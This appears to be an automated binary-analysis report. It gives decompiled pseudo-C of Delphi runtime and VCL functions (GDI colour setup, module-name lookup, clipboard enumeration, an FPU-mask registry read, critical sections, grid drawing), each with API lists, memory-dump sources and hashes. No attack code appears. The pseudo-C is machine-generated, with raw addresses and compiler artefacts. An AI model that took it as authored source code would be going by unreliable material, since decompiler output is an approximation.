                                                                                				if(E0041F44C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                                                                					SetBkColor( *(_t36 + 4),  !(E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14))))));
                                                                                					return SetBkMode( *(_t36 + 4), 1);
                                                                                				} else {
                                                                                					SetBkColor( *(_t36 + 4), E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14)))));
                                                                                					return SetBkMode( *(_t36 + 4), 2);
                                                                                				}
                                                                                			}





                                                                                APIs
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041FF9C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041FFAE
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFD1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041FFDC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFF7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00420002
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
                                                                                • Instruction ID: ce20360677368ed10bfa08b12ecf4a693c863dce037180e37b3076ca4ee65ff2
                                                                                • Opcode Fuzzy Hash: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
                                                                                • Instruction Fuzzy Hash: FEF01DF46001109BCA00FFAAD9C7D4B7BA8AF043097014466B909EF187C979E8654739
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E74(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v273;
                                                                                				char _v534;
                                                                                				char _v790;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                				char _v824;
                                                                                				intOrPtr _v828;
                                                                                				char _v832;
                                                                                				intOrPtr _v836;
                                                                                				char _v840;
                                                                                				intOrPtr _v844;
                                                                                				char _v848;
                                                                                				char* _v852;
                                                                                				char _v856;
                                                                                				char _v860;
                                                                                				char _v1116;
                                                                                				void* __edi;
                                                                                				struct HINSTANCE__* _t40;
                                                                                				intOrPtr _t51;
                                                                                				struct HINSTANCE__* _t53;
                                                                                				void* _t69;
                                                                                				long _t72;
                                                                                				void* _t73;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t83;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr* _t87;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t73 = __edx;
                                                                                				_t87 = __eax;
                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                				if(_v820.State != 0x1000) {
                                                                                					L2:
                                                                                					_t40 =  *0x487714; // 0x400000
                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                					_v12 = E00409E68(_t73);
                                                                                					L4:
                                                                                					E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t89) + 1);
                                                                                					_t74 = 0x409ff4;
                                                                                					_t86 = 0x409ff4;
                                                                                					_t83 =  *0x40771c; // 0x407768
                                                                                					if(E00403740(_t87, _t83) != 0) {
                                                                                						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
                                                                                						_t69 = E00408B40(_t74, 0x409ff4);
                                                                                						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                							_t86 = 0x409ff8;
                                                                                						}
                                                                                					}
                                                                                					_t51 =  *0x486d9c; // 0x4074dc
                                                                                					_t16 = _t51 + 4; // 0xffe7
                                                                                					_t53 =  *0x487714; // 0x400000
                                                                                					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
                                                                                					E00403504( *_t87,  &_v1116);
                                                                                					_v860 =  &_v1116;
                                                                                					_v856 = 4;
                                                                                					_v852 =  &_v273;
                                                                                					_v848 = 6;
                                                                                					_v844 = _v12;
                                                                                					_v840 = 5;
                                                                                					_v836 = _t74;
                                                                                					_v832 = 6;
                                                                                					_v828 = _t86;
                                                                                					_v824 = 6;
                                                                                					E00409260(_v8,  &_v790, _a4, 4,  &_v860);
                                                                                					return E00408B40(_v8, _t86);
                                                                                				}
                                                                                				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                                				_t89 = _t72;
                                                                                				if(_t72 != 0) {
                                                                                					_t75 = _t73 - _v820.AllocationBase;
                                                                                					__eflags = _t75;
                                                                                					_v12 = _t75;
                                                                                					goto L4;
                                                                                				}
                                                                                				goto L2;
                                                                                			}
































                                                                                0x00409fc1
                                                                                0x00409fdd
                                                                                0x00409ff0
                                                                                0x00409ff0
                                                                                0x00409eb5
                                                                                0x00409eba
                                                                                0x00409ebc
                                                                                0x00409ee1
                                                                                0x00409ee1
                                                                                0x00409ee7
                                                                                0x00000000
                                                                                0x00409ee7
                                                                                0x00000000

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction ID: 6dfe20bedbac6529fe5b7d32f625191ad228f2dd1b86655df6fb646d007f6676
                                                                                • Opcode Fuzzy Hash: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction Fuzzy Hash: 27412171A002589BDB21DB69CD85BDAB7BC9B08344F0044FAB548F7292D778AF84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E72(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v273;
                                                                                				char _v534;
                                                                                				char _v790;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                				char _v824;
                                                                                				intOrPtr _v828;
                                                                                				char _v832;
                                                                                				intOrPtr _v836;
                                                                                				char _v840;
                                                                                				intOrPtr _v844;
                                                                                				char _v848;
                                                                                				char* _v852;
                                                                                				char _v856;
                                                                                				char _v860;
                                                                                				char _v1116;
                                                                                				void* __edi;
                                                                                				struct HINSTANCE__* _t40;
                                                                                				intOrPtr _t51;
                                                                                				struct HINSTANCE__* _t53;
                                                                                				void* _t69;
                                                                                				long _t72;
                                                                                				void* _t74;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t77;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr* _t92;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t74 = __edx;
                                                                                				_t92 = __eax;
                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                				if(_v820.State != 0x1000) {
                                                                                					L3:
                                                                                					_t40 =  *0x487714; // 0x400000
                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                					_v12 = E00409E68(_t74);
                                                                                				} else {
                                                                                					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                                					_t101 = _t72;
                                                                                					if(_t72 != 0) {
                                                                                						_t77 = _t74 - _v820.AllocationBase;
                                                                                						__eflags = _t77;
                                                                                						_v12 = _t77;
                                                                                					} else {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t101) + 1);
                                                                                				_t75 = 0x409ff4;
                                                                                				_t89 = 0x409ff4;
                                                                                				_t85 =  *0x40771c; // 0x407768
                                                                                				if(E00403740(_t92, _t85) != 0) {
                                                                                					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
                                                                                					_t69 = E00408B40(_t75, 0x409ff4);
                                                                                					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                						_t89 = 0x409ff8;
                                                                                					}
                                                                                				}
                                                                                				_t51 =  *0x486d9c; // 0x4074dc
                                                                                				_t16 = _t51 + 4; // 0xffe7
                                                                                				_t53 =  *0x487714; // 0x400000
                                                                                				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
                                                                                				E00403504( *_t92,  &_v1116);
                                                                                				_v860 =  &_v1116;
                                                                                				_v856 = 4;
                                                                                				_v852 =  &_v273;
                                                                                				_v848 = 6;
                                                                                				_v844 = _v12;
                                                                                				_v840 = 5;
                                                                                				_v836 = _t75;
                                                                                				_v832 = 6;
                                                                                				_v828 = _t89;
                                                                                				_v824 = 6;
                                                                                				E00409260(_v8,  &_v790, _a4, 4,  &_v860);
                                                                                				return E00408B40(_v8, _t89);
                                                                                			}

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction ID: 0802fff38336e273a239bb27688692df7ffd8f152fb1f6293fdb009165743f52
                                                                                • Opcode Fuzzy Hash: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction Fuzzy Hash: E2412171A002589BDB21DB59CD85BDAB7BC9B08344F0044FAB548F7292D778AF848F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0042EFF0(intOrPtr* __eax, void* __edx) {
                                                                                				intOrPtr* _v8;
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				void* _t16;
                                                                                				void* _t20;
                                                                                				void* _t24;
                                                                                				void* _t25;
                                                                                				signed short _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t38;
                                                                                				void* _t42;
                                                                                				void* _t43;
                                                                                				void* _t45;
                                                                                				void* _t48;
                                                                                				intOrPtr _t51;
                                                                                
                                                                                				_t43 = __edx;
                                                                                				_v8 = __eax;
                                                                                				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
                                                                                				_push(_t51);
                                                                                				_push(0x42f092);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t51;
                                                                                				_t26 = EnumClipboardFormats(0);
                                                                                				_t52 = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					L4:
                                                                                					_t29 =  *0x486a9c; // 0x41ce6c
                                                                                					E0040A16C(_t29, 1);
                                                                                					E00403D80();
                                                                                					__eflags = 0;
                                                                                					_pop(_t38);
                                                                                					 *[fs:eax] = _t38;
                                                                                					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f099);
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t16 = E00421B64(_t26, _t52);
                                                                                						_t53 = _t16;
                                                                                						if(_t16 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
                                                                                						__eflags = _t26;
                                                                                						if(__eflags != 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L4;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t20 = GetClipboardData(_t26 & 0x0000ffff);
                                                                                					E00421A74(_t43, _t20, _t26, _t53, GetClipboardData(9));
                                                                                					_t24 = E00403E2C();
                                                                                					return _t24;
                                                                                				}
                                                                                				L6:
                                                                                			}

                                                                                APIs
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,0042F092), ref: 0042F014
                                                                                • GetClipboardData.USER32 ref: 0042F034
                                                                                • GetClipboardData.USER32 ref: 0042F03D
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F092), ref: 0042F059
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Clipboard$DataEnumFormats
                                                                                • String ID: hw@
                                                                                • API String ID: 1256399260-2938629419
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E0040342C() {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				int _v16;
                                                                                				signed short _t12;
                                                                                				signed short _t14;
                                                                                				intOrPtr _t27;
                                                                                				void* _t29;
                                                                                				void* _t31;
                                                                                				intOrPtr _t32;
                                                                                
                                                                                				_t29 = _t31;
                                                                                				_t32 = _t31 + 0xfffffff4;
                                                                                				_v12 =  *0x46b00c & 0x0000ffff;
                                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                					_t12 =  *0x46b00c; // 0x1332
                                                                                					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                					 *0x46b00c = _t14;
                                                                                					return _t14;
                                                                                				} else {
                                                                                					_push(_t29);
                                                                                					_push(E0040349D);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t32;
                                                                                					_v16 = 4;
                                                                                					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                					_pop(_t27);
                                                                                					 *[fs:eax] = _t27;
                                                                                					_push(0x4034a4);
                                                                                					return RegCloseKey(_v8);
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                • RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                • API String ID: 3677997916-4173385793
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E00401A78() {
                                                                                				signed int _t13;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t23;
                                                                                
                                                                                				_push(_t23);
                                                                                				_push(E00401B2E);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t23;
                                                                                				_push(0x4875c4);
                                                                                				L004013CC();
                                                                                				if( *0x487049 != 0) {
                                                                                					_push(0x4875c4);
                                                                                					L004013D4();
                                                                                				}
                                                                                				E0040143C(0x4875e4);
                                                                                				E0040143C(0x4875f4);
                                                                                				E0040143C(0x487620);
                                                                                				 *0x48761c = LocalAlloc(0, 0xff8);
                                                                                				if( *0x48761c != 0) {
                                                                                					_t13 = 3;
                                                                                					do {
                                                                                						_t20 =  *0x48761c; // 0x7528d0
                                                                                						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                						_t13 = _t13 + 1;
                                                                                					} while (_t13 != 0x401);
                                                                                					 *((intOrPtr*)(0x487608)) = 0x487604;
                                                                                					 *0x487604 = 0x487604;
                                                                                					 *0x487610 = 0x487604;
                                                                                					 *0x4875bc = 1;
                                                                                				}
                                                                                				_pop(_t19);
                                                                                				 *[fs:eax] = _t19;
                                                                                				_push(E00401B35);
                                                                                				if( *0x487049 != 0) {
                                                                                					_push(0x4875c4);
                                                                                					L004013DC();
                                                                                					return 0;
                                                                                				}
                                                                                				return 0;
                                                                                			}








                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: >u
                                                                                • API String ID: 730355536-2241530450
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004028FC(void* __eax, void* __edx) {
                                                                                				char _v271;
                                                                                				char _v532;
                                                                                				char _v534;
                                                                                				char _v535;
                                                                                				void* _t21;
                                                                                				void* _t25;
                                                                                				CHAR* _t26;
                                                                                
                                                                                				_t25 = __edx;
                                                                                				_t21 = __eax;
                                                                                				if(__eax != 0) {
                                                                                					 *_t26 = 0x40;
                                                                                					_v535 = 0x3a;
                                                                                					_v534 = 0;
                                                                                					GetCurrentDirectoryA(0x105,  &_v271);
                                                                                					SetCurrentDirectoryA(_t26);
                                                                                				}
                                                                                				GetCurrentDirectoryA(0x105,  &_v532);
                                                                                				if(_t21 != 0) {
                                                                                					SetCurrentDirectoryA( &_v271);
                                                                                				}
                                                                                				return E00404588(_t25, 0x105,  &_v532);
                                                                                			}











                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 0040292E
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402934
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 00402943
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402954
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID: :
                                                                                • API String ID: 1611563598-336475711
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0045BDF8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                				signed int _v8;
                                                                                				long _v12;
                                                                                				char _v16;
                                                                                				signed int _v17;
                                                                                				struct tagRECT _v33;
                                                                                				struct tagRECT _v49;
                                                                                				struct tagRECT _v65;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t138;
                                                                                				intOrPtr _t148;
                                                                                				signed int _t163;
                                                                                				signed int _t166;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t180;
                                                                                				intOrPtr _t181;
                                                                                				intOrPtr _t182;
                                                                                				intOrPtr _t183;
                                                                                				signed int _t188;
                                                                                				intOrPtr _t201;
                                                                                				intOrPtr _t202;
                                                                                				intOrPtr _t205;
                                                                                				intOrPtr _t206;
                                                                                				intOrPtr _t232;
                                                                                				intOrPtr _t233;
                                                                                				intOrPtr _t234;
                                                                                				intOrPtr _t235;
                                                                                				intOrPtr _t236;
                                                                                				intOrPtr _t238;
                                                                                				intOrPtr* _t240;
                                                                                				signed int _t252;
                                                                                				intOrPtr _t253;
                                                                                				intOrPtr _t256;
                                                                                				signed int _t257;
                                                                                				void* _t265;
                                                                                
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t240 = _a24 + 0xfffffffc;
                                                                                				_v16 = __edx;
                                                                                				_v49.top = _a20;
                                                                                				while(1) {
                                                                                					_t138 = _v49.top;
                                                                                					if(_t138 >= _a12) {
                                                                                						break;
                                                                                					}
                                                                                					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
                                                                                					if(_t138 > _v16) {
                                                                                						_t257 = _v8;
                                                                                						_v49.left = _v12;
                                                                                						_v49.bottom = E0045F800( *_t240, _v16) + _v49.top;
                                                                                						while(1) {
                                                                                							__eflags = _v49.left - _a16;
                                                                                							if(_v49.left >= _a16) {
                                                                                								break;
                                                                                							}
                                                                                							_t148 =  *_t240;
                                                                                							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
                                                                                							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
                                                                                								_v49.right = E0045F7E0( *_t240, _t257) + _v49.left;
                                                                                								__eflags = _v49.right - _v49.left;
                                                                                								if(_v49.right <= _v49.left) {
                                                                                									L39:
                                                                                									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
                                                                                									_t257 = _t257 + 1;
                                                                                									__eflags = _t257;
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = RectVisible(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                                								if(__eflags == 0) {
                                                                                									goto L39;
                                                                                								} else {
                                                                                									_v17 = _a4;
                                                                                									_t163 = E0045B628( *_t240, __eflags);
                                                                                									__eflags = _t163;
                                                                                									if(_t163 != 0) {
                                                                                										_t236 =  *_t240;
                                                                                										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
                                                                                										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
                                                                                											_t238 =  *_t240;
                                                                                											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
                                                                                											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
                                                                                												_t24 =  &_v17;
                                                                                												 *_t24 = _v17 | 0x00000002;
                                                                                												__eflags =  *_t24;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									_t242 = _a24 - 0x80;
                                                                                									_t166 = E0045A35C(_t257, _a24 - 0x80, _v16);
                                                                                									__eflags = _t166;
                                                                                									if(_t166 != 0) {
                                                                                										_t29 =  &_v17;
                                                                                										 *_t29 = _v17 | 0x00000001;
                                                                                										__eflags =  *_t29;
                                                                                									}
                                                                                									__eflags = _v17 & 0x00000002;
                                                                                									if((_v17 & 0x00000002) == 0) {
                                                                                										L14:
                                                                                										_t167 =  *_t240;
                                                                                										__eflags =  *((char*)(_t167 + 0x28c));
                                                                                										if( *((char*)(_t167 + 0x28c)) != 0) {
                                                                                											L16:
                                                                                											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
                                                                                											E0041FCC0( *((intOrPtr*)( *_t240 + 0x208)));
                                                                                											__eflags = _v17 & 0x00000001;
                                                                                											if(__eflags == 0) {
                                                                                												L20:
                                                                                												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
                                                                                												L21:
                                                                                												E0041F9D0(_t260,  &_v49);
                                                                                												L22:
                                                                                												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
                                                                                												_t180 =  *_t240;
                                                                                												__eflags =  *((char*)(_t180 + 0x28c));
                                                                                												if( *((char*)(_t180 + 0x28c)) != 0) {
                                                                                													__eflags = _v17 & 0x00000004;
                                                                                													if((_v17 & 0x00000004) != 0) {
                                                                                														_t201 =  *_t240;
                                                                                														__eflags =  *((char*)(_t201 + 0x1a5));
                                                                                														if( *((char*)(_t201 + 0x1a5)) != 0) {
                                                                                															_t202 = _a24;
                                                                                															_t253 = _a24;
                                                                                															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
                                                                                															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																_t257 = _t257;
                                                                                																_t205 = _a24;
                                                                                																__eflags =  *(_t205 - 0x84) & 0x00000004;
                                                                                																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
                                                                                																	_t206 = _a24;
                                                                                																	__eflags =  *(_t206 - 0x84) & 0x00000008;
                                                                                																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
                                                                                																		_t88 =  &(_v65.bottom);
                                                                                																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
                                                                                																		__eflags =  *_t88;
                                                                                																	}
                                                                                																} else {
                                                                                																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
                                                                                																}
                                                                                																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
                                                                                																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												_t181 =  *_t240;
                                                                                												__eflags =  *((char*)(_t181 + 0x28c));
                                                                                												if( *((char*)(_t181 + 0x28c)) != 0) {
                                                                                													_t182 =  *_t240;
                                                                                													__eflags =  *(_t182 + 0x1c) & 0x00000010;
                                                                                													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
                                                                                														__eflags = _v17 & 0x00000002;
                                                                                														if((_v17 & 0x00000002) != 0) {
                                                                                															_t183 =  *_t240;
                                                                                															_t252 =  *0x45c12c; // 0x2400
                                                                                															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c12c);
                                                                                															if(_t252 != ( *(_t183 + 0x248) &  *0x45c12c)) {
                                                                                																__eflags =  *( *_t240 + 0x249) & 0x00000010;
                                                                                																if(__eflags == 0) {
                                                                                																	_t188 = E004037B0( *_t240, __eflags);
                                                                                																	__eflags = _t188;
                                                                                																	if(_t188 != 0) {
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		_t257 = _t257;
                                                                                																		_v33.left = _v49.right;
                                                                                																		_v33.right = _v49.left;
                                                                                																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
                                                                                																	} else {
                                                                                																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												goto L39;
                                                                                											}
                                                                                											__eflags = _v17 & 0x00000002;
